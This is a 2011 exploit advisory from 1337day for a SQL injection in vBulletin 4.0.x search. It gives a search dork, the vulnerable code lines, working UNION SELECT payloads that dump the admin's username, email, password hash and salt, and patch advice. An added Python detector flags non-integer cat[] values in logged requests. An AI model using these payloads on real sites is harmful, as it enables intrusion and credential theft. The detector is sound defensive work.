1337day.com >> Exploit database separated by exploit type (local, remote, DoS, etc.)
[+] Site : 1337day.com
[+] Support e-mail : submit[at]1337day.com
#PhilKer - PinoyHack - RootCON - GreyHat Hackers - Security Analyst#
#[+] Discovered By : D4rkB1t
#[+] Site : 1337day.com Inj3ct0r Team
#[+] support e-mail : d4rkb1t@live.com
Product: http://www.vbulletin.com
Version: 4.0.x
Dork : inurl:"search.php?search_type=1"
--------------------------
# ~Vulnerable Codes~ #
--------------------------
/vb/search/searchtools.php - line 715;
/packages/vbforum/search/type/socialgroup.php - line 201:203;
--------------------------
# ~Exploit~ #
--------------------------
POST data on "Search Multiple Content Types" => "groups"
&cat[0]=1) UNION SELECT database()#
&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1#
More info: http://j0hnx3r.org/?p=818
Thanks to my friends from Inj3ct0r Team (1337day.com)
--------------------------
# ~Advice~ #
--------------------------
The vendor has already released a patch on vb#4.1.3.
UPDATE NOW!
Use HTTP debugger...
Or please watch this video to understand more: http://www.youtube.c...h?v=fR9RGCqIPkc
---------------------
vBulletin 4.X Security Patch
http://www.vbulletin...4495&PID=564936
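The payloads listed above all travel in the cat[0] field of the search POST, which should only ever hold a numeric category id. The following Python check is an added example, not part of the original advisory or of vBulletin's code: it flags POSTs to search.php whose cat[] values are not plain integers. The request dictionary layout, the "query" field and the source addresses are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Field names as they appear in the search form POST: cat[0], cat[1], cat[]
CAT_FIELD = re.compile(r"cat\[[0-9]*\]")
# A legitimate category id is a short run of ASCII digits and nothing else.
INT_VALUE = re.compile(r"[0-9]{1,10}")


def suspicious_cat_values(post_body: str) -> list[tuple[str, str]]:
    """Return (field, decoded value) pairs where a cat[] field is not an integer."""
    hits = []
    # parse_qsl percent-decodes names and values, so an encoded body such as
    # cat%5B0%5D=1%29+UNION... is normalised before the check runs.
    for name, value in parse_qsl(post_body, keep_blank_values=True):
        if CAT_FIELD.fullmatch(name) and not INT_VALUE.fullmatch(value):
            hits.append((name, value))
    return hits


def scan(requests: list[dict]) -> list[dict]:
    """Flag POSTs to search.php whose cat[] values fail the integer check."""
    alerts = []
    for req in requests:
        if req["method"] != "POST" or not req["path"].endswith("/search.php"):
            continue
        bad = suspicious_cat_values(req["body"])
        if bad:
            alerts.append({"src": req["src"], "fields": bad})
    return alerts


# Constructed sample requests (documentation-range addresses). The second and
# third bodies reuse the first payload from the advisory, raw and URL-encoded.
SAMPLE = [
    {"src": "192.0.2.10", "method": "POST", "path": "/search.php",
     "body": "query=test&cat[0]=1&cat[1]=12"},
    {"src": "192.0.2.66", "method": "POST", "path": "/forum/search.php",
     "body": "query=test&cat[0]=1) UNION SELECT database()#"},
    {"src": "192.0.2.67", "method": "POST", "path": "/search.php",
     "body": "query=x&cat%5B0%5D=1%29+UNION+SELECT+database%28%29%23"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE):
        print(alert)
```

The same integer-only rule is what a server-side fix enforces on input; run over logged request bodies, it helps find attempts made before the patch was applied.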
# 1337day.com [2011-05-21]